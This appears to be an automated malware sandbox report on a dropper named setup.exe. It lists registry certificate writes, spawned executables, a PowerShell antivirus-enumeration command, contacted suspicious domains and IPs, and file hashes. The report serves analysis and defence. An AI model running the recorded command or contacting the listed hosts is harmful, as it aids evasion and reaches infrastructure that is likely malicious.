| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\Documents\GuardFox\RYTKJERih9RiuHb9ci7_8U64.exe
"C:\Users\Admin\Documents\GuardFox\RYTKJERih9RiuHb9ci7_8U64.exe"
C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe
"C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe"
C:\Users\Admin\Documents\GuardFox\3i5ErgHjOmc_JCaxAqA6K_qm.exe
"C:\Users\Admin\Documents\GuardFox\3i5ErgHjOmc_JCaxAqA6K_qm.exe"
C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe
"C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe"
C:\Users\Admin\Documents\GuardFox\mC_TZP4ew0G67ccshP6WVCpa.exe
"C:\Users\Admin\Documents\GuardFox\mC_TZP4ew0G67ccshP6WVCpa.exe"
C:\Users\Admin\Documents\GuardFox\VCDz5pVhtpsFmmN6mDNqbspt.exe
"C:\Users\Admin\Documents\GuardFox\VCDz5pVhtpsFmmN6mDNqbspt.exe"
C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe
"C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe"
C:\Users\Admin\Documents\GuardFox\2Q4Wh6F8jqNnnf8CvrwTdWMf.exe
"C:\Users\Admin\Documents\GuardFox\2Q4Wh6F8jqNnnf8CvrwTdWMf.exe"
C:\Users\Admin\Documents\GuardFox\391RIFk77lQFvNCj7ssbq8zh.exe
"C:\Users\Admin\Documents\GuardFox\391RIFk77lQFvNCj7ssbq8zh.exe"
C:\Users\Admin\Documents\GuardFox\6kV68bTCnGGv1orebmMiTmwR.exe
"C:\Users\Admin\Documents\GuardFox\6kV68bTCnGGv1orebmMiTmwR.exe"
C:\Users\Admin\AppData\Local\Temp\is-S9O7B.tmp\lxe8ZxGuXmyHRbaShB6RUbK4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S9O7B.tmp\lxe8ZxGuXmyHRbaShB6RUbK4.tmp" /SL5="$D0122,4124890,54272,C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe"
C:\Users\Admin\AppData\Local\Temp\7zS760.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS1EF6.tmp\Install.exe
.\Install.exe /MFFdidt "525403" /S
C:\Users\Admin\AppData\Local\Temp\BFA7.exe
C:\Users\Admin\AppData\Local\Temp\BFA7.exe
C:\Users\Admin\AppData\Local\Temp\BFA7.exe
C:\Users\Admin\AppData\Local\Temp\BFA7.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
C:\Users\Admin\AppData\Local\Temp\38DD.exe
C:\Users\Admin\AppData\Local\Temp\38DD.exe
Network
| Country | Destination | Domain | Proto |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| US | 8.8.8.8:53 | medfioytrkdkcodlskeej.net | udp |
| US | 8.8.8.8:53 | cleued.com | udp |
| US | 8.8.8.8:53 | triedchicken.net | udp |
| US | 8.8.8.8:53 | acenitive.shop | udp |
| US | 8.8.8.8:53 | cczhk.com | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| US | 8.8.8.8:53 | def.bestsup.su | udp |
| RU | 147.45.47.101:80 | 147.45.47.101 | tcp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 104.21.91.214:80 | triedchicken.net | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 104.21.67.206:80 | 294down-river.sbs | tcp |
| US | 172.67.171.112:80 | def.bestsup.su | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 104.21.91.214:80 | triedchicken.net | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 104.21.67.206:443 | 294down-river.sbs | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 104.21.91.214:80 | triedchicken.net | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 104.21.91.214:80 | triedchicken.net | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 172.67.154.10:80 | cleued.com | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 104.21.91.214:443 | triedchicken.net | tcp |
| US | 188.114.97.2:443 | acenitive.shop | tcp |
| US | 188.114.97.2:443 | acenitive.shop | tcp |
| US | 172.67.154.10:443 | cleued.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| AR | 190.224.203.37:80 | cczhk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 91.215.85.209:443 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 8.8.8.8:53 | pergor.com | udp |
| US | 172.67.156.81:443 | pergor.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 2.19.169.32:80 | x2.c.lencr.org | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 8.8.8.8:53 | carthewasher.net | udp |
| US | 172.67.161.113:443 | carthewasher.net | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| AR | 190.224.203.37:80 | cczhk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 8.8.8.8:53 | 632432.site | udp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| NL | 194.104.136.64:443 | 632432.site | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 104.21.63.150:443 | iplis.ru | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | selebration17io.io | udp |
| DE | 185.172.128.24:80 | 185.172.128.24 | tcp |
| RU | 91.215.85.120:80 | selebration17io.io | tcp |
| DE | 185.220.101.145:10145 | tcp | |
| HK | 47.56.94.99:9001 | tcp | |
| DE | 185.220.100.251:9000 | tcp | |
| DE | 161.97.132.254:9001 | tcp | |
| DE | 138.2.165.161:9001 | tcp | |
| DE | 161.97.132.254:9001 | tcp | |
| DE | 138.2.165.161:9001 | tcp | |
| US | 8.8.8.8:53 | embol.cem | udp |
| US | 8.8.8.8:53 | embol.cem | udp |
| US | 8.8.8.8:53 | ulbdech.edu.pe | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | ulbdech.edu.pe | udp |
| US | 8.8.8.8:53 | gmbol.ce | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | wbzbdee.fr | udp |
| US | 8.8.8.8:53 | molkywby.cem | udp |
| US | 8.8.8.8:53 | gmbol.ce | udp |
| US | 8.8.8.8:53 | gmbol.ce | udp |
| US | 8.8.8.8:53 | wbzbdee.fr | udp |
| US | 8.8.8.8:53 | gmbol.ce | udp |
| US | 8.8.8.8:53 | molkywby.cem | udp |
| US | 8.8.8.8:53 | molkywby.cem | udp |
| US | 8.8.8.8:53 | sephobherz.cem | udp |
| US | 8.8.8.8:53 | sephobherz.cem | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | lobere.oj | udp |
| US | 8.8.8.8:53 | jhuzderdospbjch.cem | udp |
| US | 8.8.8.8:53 | jhuzderdospbjch.cem | udp |
| US | 8.8.8.8:53 | lobere.oj | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | eujleek.cem | udp |
| US | 8.8.8.8:53 | eujleek.cem | udp |
| US | 8.8.8.8:53 | hejmbol.ce.uk | udp |
| US | 8.8.8.8:53 | spe.kfs.edu.eg | udp |
| US | 8.8.8.8:53 | hejmbol.fr | udp |
| US | 8.8.8.8:53 | hejmbol.ce.uk | udp |
| US | 8.8.8.8:53 | hejmbol.ce.uk | udp |
| US | 8.8.8.8:53 | eujleek.cem | udp |
| US | 8.8.8.8:53 | spe.kfs.edu.eg | udp |
| US | 8.8.8.8:53 | eujleek.cem | udp |
| US | 8.8.8.8:53 | spe.kfs.edu.eg | udp |
| US | 8.8.8.8:53 | ybhee.oz | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | hejmbol.oj | udp |
| US | 8.8.8.8:53 | hejmbol.ph | udp |
| US | 8.8.8.8:53 | bbxsbolozgscheel.gr | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | hejmbol.fr | udp |
| US | 8.8.8.8:53 | mail.ce.uk | udp |
| US | 8.8.8.8:53 | hejmbol.fr | udp |
| US | 8.8.8.8:53 | ybhee.oz | udp |
| US | 8.8.8.8:53 | mail.ce.uk | udp |
| US | 8.8.8.8:53 | spe-kfs-edu-eg.mail.eo.outlook.com | udp |
| US | 8.8.8.8:53 | hejmbol.oj | udp |
| US | 8.8.8.8:53 | hejmbol.oj | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | hejmbol.ph | udp |
| US | 8.8.8.8:53 | bbxsbolozgscheel.gr | udp |
| US | 8.8.8.8:53 | ybhee.cem | udp |
| US | 8.8.8.8:53 | hejmbol.ph | udp |
| US | 8.8.8.8:53 | hejmbol.ph | udp |
Files
memory/3020-0-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/3020-1-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/3020-2-0x000007FEFD260000-0x000007FEFD2CC000-memory.dmp
memory/3020-3-0x000007FEFD260000-0x000007FEFD2CC000-memory.dmp
memory/3020-4-0x000007FEFD260000-0x000007FEFD2CC000-memory.dmp
memory/3020-5-0x000007FE80010000-0x000007FE80011000-memory.dmp
memory/3020-6-0x00000000003E0000-0x00000000003E1000-memory.dmp
memory/3020-7-0x00000000773F0000-0x0000000077599000-memory.dmp
memory/3020-8-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/3020-9-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/3020-10-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/3020-11-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/3020-12-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/3020-13-0x0000000140000000-0x0000000140B9C000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
C:\Users\Admin\AppData\Local\Temp\Cab95DB.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar95EE.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
memory/3020-55-0x0000000140000000-0x0000000140B9C000-memory.dmp
C:\Users\Admin\Documents\GuardFox\3i5ErgHjOmc_JCaxAqA6K_qm.exe
| MD5 | 852f8672ad668dbef934f55b4d098973 |
| SHA1 | 75713a5a598e5eccb863f6670ff4e5738058a64e |
| SHA256 | 5bd8c1d6809b1605876dc47c8a04312ebbbb7fc5d443ea81b1e3665c2fc34428 |
| SHA512 | 5dadb891221cf37f451e563e775f793146c549390f1cd8524462f000b4ccc7337451997f00f089082674744ba9cd9a387615394f7428f48b69c429587ede0426 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3fd11c12da67032f4efb45aa4f2430a0 |
| SHA1 | 7086420fbdfe7f6aa0df1d38ea43ceb794e0dab0 |
| SHA256 | c304c5484528a4b399db66fbacf0ea87f11ba1f039ab478c133e237616aebb9f |
| SHA512 | c301ccd805cdba7a8ec3e0c0e974daf43e2a13e80016bacf0c6d14305d6787709e62c3c74b6e8a5796e41139b8127a55015253090ef9c1d9f99132aac2424b3e |
C:\Users\Admin\Documents\GuardFox\lxe8ZxGuXmyHRbaShB6RUbK4.exe
| MD5 | c57ebe73a6b34d435d831b2c72452106 |
| SHA1 | c8145f14e0ca305c83b2c7f91f0db4e4ed0bee51 |
| SHA256 | e61c96de658761a01eb7f66508b488bb3a446d802b3160e961e40dcbe87e5b98 |
| SHA512 | 0b9969c513540be069d47b5a1f33589ec3972eab5075fc40211febb22352c3c543d64399f933723d14a88923f3dcc756d95238d49c03cc32ce519e5beb89254a |
C:\Users\Admin\Documents\GuardFox\VCDz5pVhtpsFmmN6mDNqbspt.exe
| MD5 | e2ee0e61b44565d7a79e481d3d3de393 |
| SHA1 | cc39ff334c7b75de9738fbfe938030b83f0777dd |
| SHA256 | 4eb731b188e42830d805b32408aee3146ded8a2beca07677d9734a7beda9c469 |
| SHA512 | 45f2fcbc1107bd6205b2f23a80c77df8735570590a954784db80476ffca9179299640b7d4c8c61fe2e6ccbf53e6787c34aedd334b6620ab77c3ed62430ce2644 |
C:\Users\Admin\Documents\GuardFox\391RIFk77lQFvNCj7ssbq8zh.exe
| MD5 | 43abfd80cbfe8afaa65961856640efc4 |
| SHA1 | 71614b90bb167b289d6d01d3768727eb6ac61ec5 |
| SHA256 | f125414e6c33771e07ed5b186e765c5c7cbab090deee72d70af657f1b4abf691 |
| SHA512 | bf84a17d811fcd20602a49121731399517e327cf5b1af015d1967af7d741c1b1b03219da0d62b1d9f8abdd800ef7edca83acb7ca909deffdc5023853ea8b540e |
C:\Users\Admin\Documents\GuardFox\mC_TZP4ew0G67ccshP6WVCpa.exe
| MD5 | 8b821b8bf586d7b270d8239acc39c0f7 |
| SHA1 | 4fa149128154c3876109d8d792d3141d82fb93c2 |
| SHA256 | 10ab3c85b94eb35619c1fff5713fb5641852c8a15d28cf4f37ecafb735bf2aad |
| SHA512 | 152fb69f64b3c4b36ac5a42874f5d8a8ad1da98365e19a45cc0d04cb9dbef863eb75c777490c1f305c910ed1a75d129185322aab9b3dcea3bc7cbee24fb6607f |
C:\Users\Admin\Documents\GuardFox\6kV68bTCnGGv1orebmMiTmwR.exe
| MD5 | 631393c67cb220cf18796dec2314c118 |
| SHA1 | 751638c8a1b070b354231a2fd4283f02f303ca94 |
| SHA256 | e98c24e3639daa42b133774bce94eb385d68b2a81be6fe460c997c5be900a600 |
| SHA512 | b41105af3663da05fd2382735aede37da71a5d85ba1051a7fba03f6beeb556d842015e9977171de3285d7bbe47a41200db8de9748c3b4629d342d013593c07d6 |
memory/3020-202-0x0000000140000000-0x0000000140B9C000-memory.dmp
C:\Users\Admin\Documents\GuardFox\v7aJoARLTh66sOaiUGezYuxG.exe
| MD5 | 9487f8cfe8666169dbfc5434afd27485 |
| SHA1 | a4ee5809469c73857aaecba8f5b2b93cf0032c2f |
| SHA256 | 51998723edeff7060be10462f2b6c822335684f8fb5ec77779e6b4ec833b1c0a |
| SHA512 | 72be5348e2e1d97c57fdbadb4fd51f49478e901c6b9c202150ab02f1212e7811ac078f19edf790a89a8b6b2fed98776333ddda8b72ec2e31fbd0afe1a6e31c0f |
C:\Users\Admin\Documents\GuardFox\I10Bs31inqsmkmzmxnpAQrv9.exe
| MD5 | a2cd0ee55ac61c65ad6d4be2ef602c18 |
| SHA1 | d96591ad585284c13d277d578851ab6293d44310 |
| SHA256 | b68e8b42419bc60ff72822495bf99175506668091a58fbd1d11747e039192be7 |
